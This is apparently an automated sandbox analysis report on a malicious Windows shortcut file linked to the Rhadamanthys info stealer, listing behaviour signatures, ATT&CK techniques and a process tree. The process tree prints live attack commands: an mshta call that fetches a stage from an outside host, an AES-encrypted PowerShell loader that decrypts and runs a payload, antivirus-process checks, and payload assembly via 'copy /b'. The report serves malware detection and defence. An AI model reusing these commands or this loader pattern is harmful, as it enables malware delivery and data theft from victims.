rhadamanthys | c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a

Analysis

max time kernel
148s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
19-04-2024 01:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
Size

1KB
MD5

b6c511480d3c76834e42b773836e76a9
SHA1

f135c8ece764465c4e9ba8fded937f0ad4a5ab79
SHA256

c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a
SHA512

f11d8780b11eee262276b0f16b65504b1f1e31ba6a25bbf7af3577079121a94f17ddcfb49fdbda08ec3c438bf1b2faa10b49281d29168f0d541cef089558c18d

Score

10^/10

rhadamanthys stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0had.com/stage

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Cheers.pif

description pid process target process

PID 3644 created 2692 3644 Cheers.pif sihost.exe
Blocklisted process makes network request 2 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

26 3940 mshta.exe
36 4276 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 3644 created 2692	3644	Cheers.pif	sihost.exe

flow	pid	process
26	3940	mshta.exe
36	4276	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exeDisabilityCharge.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation	DisabilityCharge.exe

Executes dropped EXE 2 IoCs

Processes:

DisabilityCharge.exeCheers.pif

pid process

1232 DisabilityCharge.exe
3644 Cheers.pif
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

644 3644 WerFault.exe Cheers.pif

pid	process
1232	DisabilityCharge.exe
3644	Cheers.pif

pid	pid_target	process	target process
644	3644	WerFault.exe	Cheers.pif

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2784 tasklist.exe
3576 tasklist.exe

pid	process
2784	tasklist.exe
3576	tasklist.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2024 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000_Classes\Local Settings	powershell.exe

pid	process
2024	PING.EXE

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exepowershell.exeCheers.pifAcroRd32.exedialer.exe

pid	process
1544	powershell.exe
1544	powershell.exe
4276	powershell.exe
4276	powershell.exe
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
3644	Cheers.pif
3644	Cheers.pif
5116	dialer.exe
5116	dialer.exe
5116	dialer.exe
5116	dialer.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	2784	tasklist.exe
Token: SeDebugPrivilege	3576	tasklist.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

AcroRd32.exeCheers.pif

pid process

1392 AcroRd32.exe
3644 Cheers.pif
3644 Cheers.pif
3644 Cheers.pif
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Cheers.pif

pid process

3644 Cheers.pif
3644 Cheers.pif
3644 Cheers.pif
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

AcroRd32.exe

pid process

1392 AcroRd32.exe
1392 AcroRd32.exe
1392 AcroRd32.exe
1392 AcroRd32.exe
1392 AcroRd32.exe

pid	process
1392	AcroRd32.exe
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif

pid	process
3644	Cheers.pif
3644	Cheers.pif
3644	Cheers.pif

pid	process
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe
1392	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeforfiles.exepowershell.exemshta.exepowershell.exeDisabilityCharge.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 5092 wrote to memory of 4692	5092	cmd.exe	forfiles.exe
PID 5092 wrote to memory of 4692	5092	cmd.exe	forfiles.exe
PID 4692 wrote to memory of 1544	4692	forfiles.exe	powershell.exe
PID 4692 wrote to memory of 1544	4692	forfiles.exe	powershell.exe
PID 1544 wrote to memory of 3940	1544	powershell.exe	mshta.exe
PID 1544 wrote to memory of 3940	1544	powershell.exe	mshta.exe
PID 3940 wrote to memory of 4276	3940	mshta.exe	powershell.exe
PID 3940 wrote to memory of 4276	3940	mshta.exe	powershell.exe
PID 4276 wrote to memory of 1392	4276	powershell.exe	AcroRd32.exe
PID 4276 wrote to memory of 1392	4276	powershell.exe	AcroRd32.exe
PID 4276 wrote to memory of 1392	4276	powershell.exe	AcroRd32.exe
PID 4276 wrote to memory of 1232	4276	powershell.exe	DisabilityCharge.exe
PID 4276 wrote to memory of 1232	4276	powershell.exe	DisabilityCharge.exe
PID 4276 wrote to memory of 1232	4276	powershell.exe	DisabilityCharge.exe
PID 1232 wrote to memory of 1584	1232	DisabilityCharge.exe	cmd.exe
PID 1232 wrote to memory of 1584	1232	DisabilityCharge.exe	cmd.exe
PID 1232 wrote to memory of 1584	1232	DisabilityCharge.exe	cmd.exe
PID 1392 wrote to memory of 2668	1392	AcroRd32.exe	RdrCEF.exe
PID 1392 wrote to memory of 2668	1392	AcroRd32.exe	RdrCEF.exe
PID 1392 wrote to memory of 2668	1392	AcroRd32.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4292	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4868	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4868	2668	RdrCEF.exe	RdrCEF.exe
PID 2668 wrote to memory of 4868	2668	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2692

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5116

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\c4e79437d564a08dacec5a0bb754c6f03d13333276c9a48253a247bef5742c0a.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://0had.com/stage"
2⤵
- Suspicious use of WriteProcessMemory
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
. mshta http://0had.com/stage
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://0had.com/stage
4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function GWVkC($OQIVk){return -split ($OQIVk -replace '..', '0x$& ')};$oUlJnFU = GWVkC('56A67CC90F7BC928FBB76DA2E224750D586965A7E0F8F557FF0856E894FEFF3BE7B23E6855B782A6630796E17202BD0E08D3E05FDBBA972A66EDD309CE61FAF317E38E20EF7B53C12E98E21C1172169AC870221DCF2CBFB2D28EABAEEE6AFE15DDC75D7F9A7EA6D4DCC11B60AD525062D432C1AF7F266A339581F8FE2577BCC208479F427C72D55A0009C9E5A454524C65816B86781571F5EAB763314745A0D5BBC269E7A28786F9F158D877A3785822976D61421897BA6E4015C3F00531CFE41809A1325D6C3B8CF2748C6913AC1B41D628D7D473F91707340A60B22D9994D94996EDCFEE33B67F9C118BCA16A64C4142D6A6ED45C2BF89E94D37D5B5A05D6CD6C044E1F5A7B39E2A676BD986430EFCAB1DEB19487A3C5B8692920814DA65EDBDEB811B0580D2634A520F0CB427693A05139D1791FBFF12BFA351AF662C53C02D3E6474D0884ADE26C0F04467CCC00864FD2A191A25501FD800885F045F307C5B5E31EC6AA3E51EB15BA71BFB647E97FA57C577BDBC2194AFEF6973F8A1618DB0AFCB5098A1659ECB2B8E0A9EA0C96549C0ACD148FF865B1F0EA60038B83E8031D1D52F3A852928554E936725C228252454C2422644121EBBF81D24926CFB00A71761AAE91ED9DF8D85F6F727C0D2983D845E9DFDAF0BF9286B28A0CD895C043907B6915FA7A8554C7CFBA3F408233D3F7F7922D02078F0A2E0AE94431CFB442F120BA1732E01F42A09AE837D10BEDD086E56BD70D0FBEBCEAE956284103044B68C0011B5F3B1E6529F4917947C8D0BC96836D1978317B140005D1C7047441719DE342E4662F38739895EBCB8375DCBC834A3D28AFE1A37E319CFA9894ED2B383627DEC489C20578355FC8196FE4164AC46D8DF7A20B62BAC13DB33906E7B22DC66483610E72C4FDD7F12AEC6A90A9F2E02802F04735D72234BAA5C52BCADB5575E9765C2DAE7C823087738C74006C2E1D72411A0F17F1C17AD882BA6F2A3C540A40E5A588AD370AD7643FF3A97CB0FBF388198B446C80213BD48767D581E363D9C3F081CDCA1F1891D30F4043BCC20E0713B31F0D72B18DA3B1E9688B94B7D68E3ABC4254D67FE62005219CA0673300BC22FB4F6C028D030838630239C508AD69B0D9D11E1DAED55BC0953D3D9232F60D9037915FABF10317D40FA5F2355394565BED8255AA7F2E9FEF0A9DEE5B6006F5439968F2CBC453F2ACCE7B287C6036B84ED4445D36A6B3481242E607AF0889ADF450C941CEED12A13C2162395BCDB9F6235416B983CCEBBD1289677DEE3A826B0BDC9DBB9EBFDE9828DABF50E4263BF2AAB34C67531AE59282CD4788143AEECD147543A8BAEBBD2F897086B5E6453A3EADE2E2427625B246CE8C1AF7FCB313EA4934F3B7948350E5398004C9471F553675D2C7B49364965B70120328686B775B8D1F05B2ABE4E816337195BCACDE8AB87B09D1AAAABCD7E08CA410CD3E5B4A0EDA996EEF343F17A0C2B755A103479D899A225EBFC9224558A8F2DB20D7E73A228C58F7F35C669B2719A06C068D8A9B7540F8BAACE9FB57064502FAA3C4CACAD9AA2E5C189F2F08723325BF8CD94C37AF87AA65F01D53020EE2F89AC43873D');$PpVdc = [System.Security.Cryptography.Aes]::Create();$PpVdc.Key = GWVkC('72417566717042666B7664427A694669');$PpVdc.IV = New-Object byte[] 16;$tRHLMuaf = $PpVdc.CreateDecryptor();$euSjzsAcc = $tRHLMuaf.TransformFinalBlock($oUlJnFU, 0, $oUlJnFU.Length);$XdUHAvYuR = [System.Text.Encoding]::Utf8.GetString($euSjzsAcc);$tRHLMuaf.Dispose();& $XdUHAvYuR.Substring(0,3) $XdUHAvYuR.Substring(3)
5⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\SA160.pdf"
6⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1392

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
7⤵
- Suspicious use of WriteProcessMemory
PID:2668

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E245D665A16716F447C21EBF6C14233A --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:4292

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=253E4F628EA0E2D8CF63BDBB81AE5A14 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
8⤵
PID:4868

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9EE6EBD83BD3CB4BE08FBB3D1F0D145A --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
8⤵
PID:1168

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=53EC0F4E1A36CEEAC524EBB74D839C5D --mojo-platform-channel-handle=2428 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:1344

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=771B443710D1FD2BB21D02FCFC455B84 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:1884

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BDE6EBD58198AAEC906B8B75492765F8 --mojo-platform-channel-handle=2672 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
8⤵
PID:2324

C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe
"C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c move Observed Observed.bat && Observed.bat
7⤵
PID:1584

C:\Windows\SysWOW64\tasklist.exe
tasklist
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
8⤵
PID:3600

C:\Windows\SysWOW64\tasklist.exe
tasklist
8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
8⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
cmd /c md 5139075
8⤵
PID:848

C:\Windows\SysWOW64\findstr.exe
findstr /V "AndreaAccessibleOriginallyElizabeth" Ons
8⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b 5139075\Cheers.pif + Software + Cap + Typing + Cingular + Dominican 5139075\Cheers.pif
8⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Customs + Placing + Anatomy + Church 5139075\M
8⤵
PID:3704

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
5139075\Cheers.pif 5139075\M
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 916
9⤵
- Program crash
PID:644

C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
8⤵
- Runs ping.exe
PID:2024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3644 -ip 3644
1⤵
PID:2116

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

